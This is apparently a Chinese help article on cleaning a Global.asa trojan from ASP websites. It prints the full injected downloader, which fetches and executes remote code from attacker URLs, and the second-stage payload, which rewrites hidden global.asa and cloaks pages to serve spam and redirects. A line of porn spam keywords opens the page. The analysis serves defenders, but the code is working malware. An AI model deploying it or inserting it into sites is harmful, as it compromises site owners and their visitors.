欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

網(wǎng)站中Global.asa木馬的快速清除方法

  發(fā)布時間:2011-03-27 20:12:42   作者:佚名   我要評論
最近客戶的多個頁面中了遠(yuǎn)程加載一些代碼的頁面,主要是利用MSXML2.serverXMLHTTP來加載一些代碼并執(zhí)行,下面是具體的解決方法。
解決辦法:
1、用青云團隊開發(fā)的網(wǎng)站木馬清理專家全面掃描服務(wù)器上的網(wǎng)站,網(wǎng)站木馬清理專家下載地址:http://www.dbjr.com.cn/softs/12771.html
2、如果這時木馬還是存在,用我們的網(wǎng)站木馬清理專家的快速查馬功能快速查殺by*aming或aming特征碼,如下圖所示:

3、關(guān)閉服務(wù)器上的縮略圖功能 方法參考 http://www.dbjr.com.cn/os/windows/Win2003/34960.html
根源:
這次用戶中的是下載者類的木馬,黑客通過網(wǎng)站上傳漏洞上在網(wǎng)站根目錄的foot.asp下插入了以下代碼:

復(fù)制代碼
代碼如下:

<%
'by*aming
Function Gethtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write Gethtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
Gethtml = objStream.ReadText
objStream.Close
set objStream=Nothing
End Function
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>

清掉這段代碼即可解決問題,網(wǎng)站木馬清理專家查殺結(jié)果如下圖所示!

xmlasaquan.txt的內(nèi)容如下:

復(fù)制代碼
代碼如下:

'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
'by*aming
Server.ScriptTimeout=600
Public Function createasa(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("http://./" & Server.MapPath("/global.asa"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "http://./" & Server.MapPath("/global.asa"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
Function check(user_agent)
allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function
Function CheckRobot()
CheckRobot = False
Dim Botlist,i,Repls
Repls = request.ServerVariables("http_user_agent")
Krobotlist = "Baiduspider|Googlebot"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(Repls,Botlist(i)) > 0 Then
CheckRobot = True
Exit For
End If
Next
If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
If Session("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
Function CheckRefresh()
CheckRefresh = False
Dim Botlist,i,Repls
Krobotlist = "baidu|google|sogou|soso|youdao"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
CheckRefresh = True
Exit For
End If
Next
End Function
Sub sleep()
If response.IsClientConnected=true then
Response.Flush
else
response.end
end if
End Sub
If CheckRefresh=true Then
cnnbd=lcase(request.servervariables("HTTP_HOST"))
response.redirect("http://www.82767.com/?"&cnnbd&"")
'Response.Write("<a href=http://www.82767.com><font _fcksavedurl="http://www.82767.com><font" color=#FF0000>如果您的瀏覽器不支持跳轉(zhuǎn),請點擊進(jìn)入>>>>>></font></a><div style=display:none><script src=http://count11.#/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl="http://count11.#/click.aspx?id=114814173&logo=12></script></div><script" src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>")
response.end
end If
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
if check(user_agent)=true then
body=GetHtml("http://fudu.qpedu.cn/xml/prn/con.2.asp?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")
response.write body
response.end
else
asa=GetHtml("http://www.pornhome.com/dy7749/codequan.txt")
if instr(asa,"by*aming")>0 then
createasa(asa)
end if
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
geturl =LCase(geturl)
'response.write replace(namepath,server.MapPath("/"),"")
'response.end
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and
if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = LCase(Request.ServerVariables("HTTP_REFERER"))
bot = ""
Amll = ""
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"
if bot="nobot" then
'Call WriteErr
'response.end
end if
Call sleep()
end if
end if
'</body></html>

相關(guān)文章

  • 新型勒索病毒Petya重新席卷全球 勒索病毒Petya如何對文件進(jìn)行加密

    一波大規(guī)模勒索蠕蟲病毒攻擊重新席卷全球,電腦、服務(wù)器感染這種病毒后會被加密特定類型文件,導(dǎo)致系統(tǒng)無法正常運行,對新型勒索病毒Petya感興趣的小伙伴們可以參考一下
    2017-06-28
  • 勒索病毒最新變種驚現(xiàn)!僵尸網(wǎng)絡(luò)擴散中

    WannaCry勒索病毒的風(fēng)聲漸漸平息了。雖然全球范圍內(nèi)仍有大量的傳播和感染存在,但大家似乎都已經(jīng)不怎么關(guān)心了。不過正如地震之后的余震,病毒傳播過程中一般都會出現(xiàn)新的變
    2017-05-23
  • 看windows如何為電腦打造“免檢”木馬

    喜歡鉆研木馬的用戶會發(fā)現(xiàn)木馬傳播通常將木馬程序和合法程序捆綁在一起,欺騙被攻擊者。而現(xiàn)在有許多的軟件都已克制木馬的傳播了,一起來看看吧
    2016-09-21
  • 你知道自己的電腦感染了惡意軟件嗎?

    大家都知道惡意軟甲就在我們的身邊,時刻準(zhǔn)備著侵占我們的電腦,那么怎么才能知道那些惡意軟件是否感染了我們的電腦呢?一起來看看吧
    2016-09-09
  • 如何手動清除那些利用了映像劫持技術(shù)的病毒

    映像劫持(Image Hijack)是為一些在默認(rèn)系統(tǒng)環(huán)境中運行時可能引發(fā)錯誤的程序執(zhí)行體提供特殊的環(huán)境設(shè)定,在針對殺毒軟件方面,OSO病毒還采用了一種新技術(shù)就是映像劫持,通過
    2016-07-08
  • 詳解專家談手工查殺AV終結(jié)者病毒教程

    現(xiàn)在電腦用戶都知道,“AV終結(jié)者”肆意泛濫,很多用戶的電腦都被破壞,一些專殺工具還是不能徹底的解決這個問題,下面小編就為大家介紹一下專家談手工查殺AV終結(jié)者病毒教程
    2016-07-08
  • 電腦中的木馬病毒如何徹底查殺?

    要查殺病毒就要徹底查殺,那么要怎么樣才能徹底查殺電腦病毒呢?下面由腳本之家小編給你做出詳細(xì)的電腦病毒徹底查殺方法介紹!希望對你有幫助
    2016-04-30
  • 推薦2016年強殺電腦木馬病毒查殺排行

    現(xiàn)在的電腦殺毒軟件種類很多,在選擇的時候,很多人并不知道如何去進(jìn)行選,按照什么標(biāo)準(zhǔn)來進(jìn)行選擇,其實在選擇殺毒軟件首先要看殺毒能力,其次可以根據(jù)殺毒軟件的功能來進(jìn)
    2015-12-09
  • 三招迅速清除U盤內(nèi)的病毒

    我們常常會在硬盤的各個分區(qū)根目錄下面看到“Autorun.inf”這樣的文件,并且用鼠標(biāo)雙擊磁盤分區(qū)圖標(biāo)時,往往無法打開對應(yīng)分區(qū)窗口;遭遇類似上述現(xiàn)象時,那幾乎就能斷定本地
    2015-09-15
  • 如何快速清除系統(tǒng)中的木馬病毒 木馬病毒清除

    黑客入侵后要做的事就是上傳木馬后門,為了能夠讓上傳的木馬不被發(fā)現(xiàn),他們會想盡種種方法對其進(jìn)行偽裝。而作為被害者,我們又該如何識破偽裝,將系統(tǒng)中的木馬統(tǒng)統(tǒng)清除掉呢
    2015-09-15

最新評論